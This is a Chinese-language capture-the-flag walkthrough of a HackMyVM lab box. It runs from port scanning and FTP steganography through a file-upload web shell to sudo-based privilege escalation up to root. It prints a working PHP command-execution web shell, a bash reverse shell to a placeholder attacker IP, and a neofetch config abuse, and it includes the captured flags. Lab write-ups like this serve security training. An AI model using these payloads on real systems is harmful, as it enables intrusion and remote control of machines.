信息搜集
主机扫描
arp-scan -l端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn 192.168.122.159
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 23:53 EDT
Nmap scan report for 192.168.122.159
Host is up (0.00090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:39:4C:EB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds
匿名登录ftp
ftp ip
username:anonymous
在first目录发现一个图片利用stegseek发现一串base64
┌──(root㉿kali)-[~]
└─# stegseek first_Logo.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "firstgurl1"
[i] Original filename: "secret.txt".
[i] Extracting to "first_Logo.jpg.out".
┌──(root㉿kali)-[~]
└─# cat first_Logo.jpg.out
SGkgSSBoYWQgdG8gY2hhbmdlIHRoZSBuYW1lIG9mIHRoZSB0b2RvIGxpc3QgYmVjb3VzZSBkaXJlY3RvcnkgYnVzdGluZyBpcyB0b28gZWFzeSB0aGVlc2UgZGF5cyBhbHNvIEkgZW5jb2RlZCB0aGlzIGluIGJlc2E2NCBiZWNvdXNlIGl0IGlzIGNvb2wgYnR3IHlvdXIgdG9kbyBsaXN0IGlzIDogMmYgNzQgMzAgNjQgMzAgNWYgNmMgMzEgNzMgNzQgNWYgNjYgMzAgNzIgNWYgNjYgMzEgNzIgMzUgNzQgZG8gaXQgcXVpY2sgd2UgYXJlIHZ1bG5hcmFibGUgZG8gdGhlIGZpcnN0IGZpcnN0IA==
解密:Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first
解密十六进制:/t0d0_l1st_f0r_f1r5t路径扫描
发现一个目录,根据页面提示,可以上传到文件到网站上,于是我们扫描以下目录
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -t 100 -b 403,404 -x php,* -u http://192.168.122.159/t0d0_l1st_f0r_f1r5t/
/uploads (Status: 301) [Size: 340] [--> http://192.168.122.159/t0d0_l1st_f0r_f1r5t/uploads/]
/photos (Status: 301) [Size: 339] [--> http://192.168.122.159/t0d0_l1st_f0r_f1r5t/photos/]
/upload.php (Status: 200) [Size: 348]
于是我上传文件,通过一句话木马反弹shell
获取shell
上传文件:shell.php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
/uploads/shell.php?bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'成功反弹shell
user.txt:3120a57478d631a5ef82ef5d96146389
提权
发现用户first尝试提权获得他的权限
www-data@first:/home/first$ sudo -l
sudo -l
Matching Defaults entries for www-data on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on first:
(first : first) NOPASSWD: /bin/neofetch
利用它提权至first 新获取 | go away垃圾箱 (gtfobins.github.io)
echo 'exec /bin/sh' >shell
sudo -u first /bin/neofetch --config shell
成功提权至first再次进行提权,继续寻找可用命令
first@first:~$ sudo -l
sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret执行secret是让你输入一串pass,发现什么都没有,通过第一 – Hackmyvm – 0xH3rshel – 0xH3rshel 的博客师傅的博客明白,输入的字符串如果大于10,就会让你输入命令,输入bash获得root,这里的逆向确实有点不会(菜
sudo secret
pass: 123456789456123
correct, input command:bash
id
uid=0(root) gid=0(root) groups=0(root)
拿到root:477d9a6aa33e3818ced1ad3015******
知识点
- 二进制文件分析
- stegseek的使用,分析图片隐藏内容